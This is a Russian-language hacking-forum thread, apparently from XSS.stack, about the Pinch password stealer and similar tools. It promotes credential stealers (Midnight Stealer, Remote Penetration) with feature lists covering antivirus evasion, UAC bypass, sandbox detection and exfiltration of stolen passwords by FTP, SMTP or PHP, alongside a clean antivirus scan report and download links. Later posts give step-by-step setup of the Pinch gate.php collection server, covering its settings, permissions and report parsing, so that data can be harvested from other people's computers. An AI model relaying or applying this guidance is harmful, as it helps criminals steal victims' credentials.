• XSS.stack #1 – первый литературный журнал от юзеров форума

Pinch

Отслеживать
Midnight Stealer 1.5
2qdwpyr.jpg

Recover's :
Firefox 3
All MSN
Pidgin
Filezilla
Trillian
Winbox


File Info

Report generated: 15.4.2009 at 17.16.06 (GMT 1)
Filename: <b>TheFile.exe
File size: 48 KB
MD5 Hash: *Removed*
SHA1 Hash: *Removed*
Packer detected: Microsoft Visual Basic 5.0 / 6.0
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 0 on 24

a-squared - Nothing found!
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - Nothing found!
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - Nothing found!
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Nothing found!
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Nothing found!
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - Nothing found!
Virus Buster - Nothing found!

Scan report generated by
http://novirusthanks.org

:zns5: Скачать|Download
 
Remote Penetration v1.60 Public (Last Release: 12.4.2009)

I have been very busy recently and I haven't had much time to implement
many new features. I am about to be totally offline for a two week time frame so I have decided today to work on some new features/fixes. As for
new features I added digsby recovery. And as for the rest of the release
I re-wrote/optimized a lot of the stub's code / fixed all complaints I
received for the builder.

Recovery:
Trillian
Pidgin and Gaim
PaltalkScene
Digsby (NEW)
Live Messenger
MSN Messenger
Firefox 2.xx - 3.xx
IE6
IE7 - 8
Filezilla
Smart FTP
FlashFXP
CoreFTP
NO-IP
DynDNS
Outlook
Custom CD-Key Grabber (Input own path to key you want to grab) (On the Public version you may only input one path)
Icon Options:
Replace Default Icon:
Icon Hunter
Main Features:
FUD Scantime + Runtime
All strings are encrypted, all your inputted data, (FTP/SMTP information) is encrypted, and all API's that can be encrypted/called dynamically are encrypted.
No 3rd party applications used
UAC Bypass
Option on builder to encrypt the logfile
Can upload log file via FTP, SMTP, or Locally
Pick the logfiles attributes (Hidden, Read only, or System)
Ability to import FUD stubs
Anti-Generic Sandbox
Anti-Virtual PC, VMWare, VirtualBox
Installation options (You get the option to pick where the file drops to / where in the registry to add the startup key.)
Option to compress with UPX
Scramble the UPX header
Validate PE
Fake error message
Change the Date of the outputted executable's date
Increase the files size (Add NOP bytes to the file)
Log Decryption utility included in builder
Load and Save your sessions!
Private Version
All of the listed features above + a unique stub that no one else has.
AIM 6.xx recovery
Miranda recovery
Melt
No set number of CD-Key Paths (You can add as many keys as you want grabbed)

13283053.gif


:zns5: Скачать|Download
 
Remote Penetration v2.2 FIX (Released: 19/8/2009)

New Features:

* All PHP problems have been fixed + a new theme has been implemented!
* Updated Firefox Recovery
* Added Internet Download Manager Recovery
* Added Yahoo Messenger 8.x,9.x Recovery
* Builders dark theme removed

Recovery:

* Trillian
* Pidgin and Gaim
* PaltalkScene
* Digsby
* Live Messenger
* MSN Messenger
* Yahoo Messenger 8.x,9.x (NEW)
* AIM 6.xx (Private Version only)
* Miranda (Private Version only)
* Google Talk (Private Version only)
* Firefox 2.xx - 3.xx (Updated)
* IE6
* IE7 - 8
* Internet Download Manager (NEW)
* Filezilla
* Smart FTP
* FlashFXP
* CoreFTP
* NO-IP
* DynDNS
* Outlook
* CamFrog
* Custom CD-Key Grabber (Input own path to key you want to grab)

Icon Options:

* Replace Default Icon:
* Icon Hunter

Main Features:

* Stub / Builder made in VB6
* FUD Scantime + Runtime
* All strings are encrypted, all your inputted data, (PHP url) is encrypted, and all API's that can be encrypted/called dynamically are encrypted.
* No 3rd party applications used
* UAC Bypass
* Send info via PHP (MySQL setup)(NEW)
* Output.exe requires NO dependencies. (Builder does though)
* Ability to import FUD stubs
* Anti-Generic Sandbox
* Anti-Virtual PC, VMWare, VirtualBox
* Installation options (You get the option to pick where the file drops to / where in the registry to add the startup key.)
* Pick the dropped files attributes (Hidden, Read only, or System)
* Option to compress with UPX
* Scramble the UPX header
* Added File Version Info Cloner
* Fake error message
* Change the Date of the outputted executable's date
* Increase the files size (Add NOP bytes to the file)
* Load and Save your sessions!

Private Version

* All of the listed features above + a unique stub that no one else has.
* AIM 6.xx recovery
* Miranda recovery
* Google Talk recovery
* Melt
* Option on builder to delete, output.exe, icon. (save kbs)
* No set number of CD-Key Paths (You can add as many keys as you want grabbed)

Screenshots:
PHP Login/Logs Screenshot ->
screenshotsite.gif


:zns5: Скачать|Download
 
Я тут видел 3-ю версию пинча. кто-нибудь может то нем что-нибудь сказать?
неофициальный мод. так-же, как и большинство остальных версий
 

Будет одна рекомендация - голову лечить. Проглядел под отладчиком - ни с чем не склеено, по крайней мере версия для гейта и парсер(версию с отправкой на мыло не проверял). Если есть сомнения - тестируем на локалхосте и смотрим сниффером куда и что стучиться, также поможет разобраться если отчеты не приходят.
А если вас что-то все-таки заставляет сомневаться - дизассемблер в зубы и вперед.
 
2All На Счёт вероятного заражения, у меня эти билдеры пролежали хз скок в разделе исключений для АВ. Так что не могу сказать наверняка что там да как, сам пользовался, фаер молчал на запуск файлов, так что ничего сказать точно не могу.
 
ffdown
юзай либо 3.0х от шайтана, либо 2.99 слэша

конфигуратор от шайтана построен на основе 2.99 от слеша, только с прикрученным криптором. по сути это один и тот же пинч. т.е в твой список можно есщё добавить конф от стелена,b3jiom.
 
конфигуратор от шайтана построен на основе 2.99 от слеша, только с прикрученным криптором. по сути это один и тот же пинч.
разве? он вроде от тех-же квипов пароли лучше тянул
 
В самом топе у него написано было что его конф был построен на основе 2.99 от слеша где то на злом, ну вполне возможно что он что ни будь изменил как и b3jiom . а где то валялсо отвязанный билдер Pinch'a 2 правдо 98% функций на данный момент не рабочие, надо кому ни будь?)
 
а через гейт смогу настроить? :sorry:
а когда то настроил обычном билдом (exe), потом криптовал и в бой.

И вообше - какой способ бельше всех эффктивно ?
 
Эффективность пинча, это сейчас вообще вопрос спорный...
Открываешь скрипт gate.php через блокнот или лбобой другой текстовый редактор и видешь там код написанный на php, ищешь там:
$mode = 2;          //1.Send to e-mail, 2.Save to file, 3.E-mail+file
$rndatch = FALSE;   //Random reports names
$savetodir = true; //Save reports to changed directory
$dirname = "report";      //Directory name
Ну тут всё просто....
$mode - Это метот сохронения отчётов, если поставить 1 то отчёты буду отправятся на мыло указанное в момент сборки пинча или если поколдуешь то на мыло указанное в гейте, 2 файл отчёта сохронять в указанную директори параметром $savetodir, если не указана директория, то сохранится просто в ту же папку где и сам gate.php, 3 Отправить файл отчёта на почту с прикреплённым к письму файлом.
$rndatch - использовать или не использовать случайное имя файла отчёта. Эта переменная типа "Boolean" и тут только 2 варианьа "true/false" разрешить или запретить. Делается это для того, что бы отчёты сами себя не перезаписывали елси вдруг попадётся отчёт с точно таким же названием, но это, как показывает практика мало вероятно.
$savetodir - сохранять отчёты в указанную директорию. Так же переменная типа "boolean" опять таки true/false.
$dirname - Имя директории куда сохранять отчёты.
 
DarckSol

спасибо друг ! а говорят, что надо иметь домен+хостинг, чтоб туда залеть..
У меня есть. можешь помочь в этом деле?

[mod][Ar3s] Возможен сбрученный аккаунт. Осторожно![/mod]
 
Заливаешь всё на хост, настраиваешь гейт.... Далше... ну допустим домен у тебя www.pinch3report.com... Значит к примеру, зели ты гейт на сайт с именем gate.php создал папку report, если сервак линуксовый то дать права gate.php 755, а папке для отчётов 777. Дальше заходишь ты на свой домен через браузер и попадаешь на свой "сайт" где в корне его лежит gate.php, тобишь примерно так: "www.pinch3report.com/gate.php и смотришь появился ли пустой отчёт в папке с отчётами, если да, то все нормально, если нет, то капайся дальше с правами на чтение и запись и проверяй наличие PHP на сервере вообще...
И тпе, отчёт появился, мы его сносим, и делаем билд пинча на эту ссылку... Где изначально у нас лежит гейт(www.pinch3report.com/gate.php). Делаем билд и проверяем его на работоспособность, как правило стандартный пинч не имеет функций червя, и всяких там гадостей, он сграбит пароли и отошлёт на гейт. Снова проверяем хостин и смотрим папку с отчётами, дам должен появится отчёт с твоего компа, качаем его и сохраняем по адресу "C:\reportByPinch\". После чего запускаем парвер отчётов, он есть в архиве, и навастриваем его профиль.. в строке брать отчёты указываем папку куда мы положили отчёт, то бишь у нас это "C:\reportByPinch\" и сохраняем настройки, после чего жмём применить их, и в парсере появится строка где и будет твой отчёт. Усе, работаем и собираем инфу с других компов.
ЗЫ:Названия файлов и папок можно менять на произвольные, копировать названия приведённые в примере не обязательно.
 
[Ar3s]Возможен сбрученный аккаунт. Осторожно!
Это у меня сбрученный? нет ! я могу предоставить любую доказательство, что я релаьный владелец этого акаунта. могу рассказывать о старых "конфликтах в форуме". это так, чтоб вы не сомневались. просто столько вреня я не зашел сюда по "уважаемой" причине.

DarckSol

спасибо, попробую. Тут абуза или т.п. дела не могут быть с моим доменом? я могу потом его использовать в приличных целях ?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх